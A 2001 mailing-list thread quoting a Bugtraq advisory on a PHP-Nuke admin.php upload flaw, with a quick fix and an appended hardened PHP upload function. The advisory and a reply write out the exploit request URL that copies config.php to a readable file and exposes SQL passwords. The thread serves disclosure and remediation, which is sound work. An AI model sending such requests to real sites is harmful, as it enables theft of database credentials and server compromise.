[linux] PHP Bug
I suppose you all read Bugtraq ...
but did you know that
http://127.0.0.1/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
http://127.0.0.1/images/hacked.txt and you will see config.php that as
And linuxbe.org? Well, no, they know how to configure Apache, unlike
me :) ....
Dominique
Alternative "quickfix"; change
"if($upload) {" to
"if (($upload) && ($admintest)) {"
This at least works for PostNuke 0.62. I have not tested the latest PostNuke
0.63 - it may be vulnerable as well...
And btw; if you're not going to use the filemanager, disallow write access
for the webuser (usually nobody or www) to all files/directories below
webroot.
Magnus Skjegstad
----- Original Message -----
From: <supergate@twlc.net>
To: "bugtraq" <bugtraq@securityfocus.com>
Sent: Monday, September 24, 2001 9:31 PM
Subject: twlc advisory: all versions of php nuke are vulnerable...
> Explanation
> Do you need sql password?
>
>
> http://www.server.net/admin.php?upload=1&file=config.php&file_name=hacked.txt&wdir=/images/&userfile=config.php&userfile_name=hacked.txt
>
> the admin 'login' page will be prompted just go to
> http://www.server.net/images/hacked.txt and you will see config.php that as
> everyone knows contains the sql's passwords, you can even upload files...i
> leave you the 'fun' to find all the ways to use it... and try not to be a
> SCRIPT KIDDIE we wrote this advisory to help who runs php nuke and NOT TO
> LET YOU HAVE FUN.
>
> let me explain the bug to you... admin.php contains this routine:
>
> $basedir = dirname($SCRIPT_FILENAME);
> $textrows = 20;
> $textcols = 85;
> $udir = dirname($PHP_SELF);
> if(!$wdir) $wdir="/";
> if($cancel) $op="FileManager";
> if($upload) {
> copy($userfile,$basedir.$wdir.$userfile_name);
> $lastaction = ""._UPLOADED." $userfile_name --> $wdir";
> // This need a rewrite -------------------------------------> OMG! WE AGREEEEEEEE lmao
> //include("header.php");
> //GraphicAdmin($hlpfile);
> //html_header();
> //displaydir();
> $wdir2="/";
> chdir($basedir . $wdir2);
> //CloseTable();
> //include("footer.php");
> Header("Location: admin.php?op=FileManager");
> exit;
> }
[ Please be specific in your subject lines so that the type of   ]
[ request can be identified directly...                          ]
[ To (un)subscribe, go to http://unixtech.be/ml.php ]
[ Mailing list archives: http://archives.unixtech.be/linux/ ]
[ http://unixtech.be Contact: listmaster@unixtech.be ]
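
A hardened form of the upload branch quoted in the advisory, as an added example that is not part of the thread or of PHP-Nuke/PostNuke code. It checks authorization first (the role `$admintest` plays in the quick fix) and accepts only a file PHP actually received over POST, because the quoted routine copies whatever path arrives in `$userfile`. The function name, `$isAdmin` and the sample request are assumptions.

```php
<?php
// Added example, not PHP-Nuke/PostNuke code. store_upload(), $isAdmin and the
// directory layout are assumptions made for illustration.

/**
 * Store an uploaded file under $baseDir/$wdir and return the destination path.
 * Throws RuntimeException with the reason when the request is refused.
 */
function store_upload(bool $isAdmin, array $file, string $wdir, string $baseDir): string
{
    // 1. Authorize before acting (the role of $admintest in the quick fix).
    if (!$isAdmin) {
        throw new RuntimeException('not authenticated as admin');
    }
    // 2. The source must be a file PHP itself received via HTTP POST,
    //    never a path taken from request parameters.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        throw new RuntimeException('source is not an uploaded file');
    }
    // 3. Resolve the target directory and keep it inside the base directory.
    $base = realpath($baseDir);
    $dir  = realpath($baseDir . '/' . $wdir);
    if ($base === false || $dir === false || !is_dir($dir)
        || ($dir !== $base && strpos($dir, $base . DIRECTORY_SEPARATOR) !== 0)) {
        throw new RuntimeException('target directory outside base directory');
    }
    // 4. Keep only the final name component; refuse script extensions.
    $name = basename($file['name'] ?? '');
    if ($name === '' || $name[0] === '.' || preg_match('/\.(php\d?|phtml|phar)$/i', $name)) {
        throw new RuntimeException('file name not allowed');
    }
    $dest = $dir . DIRECTORY_SEPARATOR . $name;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    return $dest;
}

// Constructed input mirroring the request in the advisory: the "upload"
// source is a local path rather than a file PHP received.
$forged = ['name' => 'hacked.txt', 'tmp_name' => __DIR__ . '/config.php', 'error' => UPLOAD_ERR_OK];
foreach ([[false, 'anonymous'], [true, 'admin']] as [$isAdmin, $who]) {
    try {
        store_upload($isAdmin, $forged, 'images', __DIR__);
    } catch (RuntimeException $e) {
        echo "$who: refused ({$e->getMessage()})\n";
    }
}
```

Run from the command line, both constructed requests are refused: the anonymous one at the authorization check, and the admin one because `is_uploaded_file()` rejects a source that did not arrive as a POST upload.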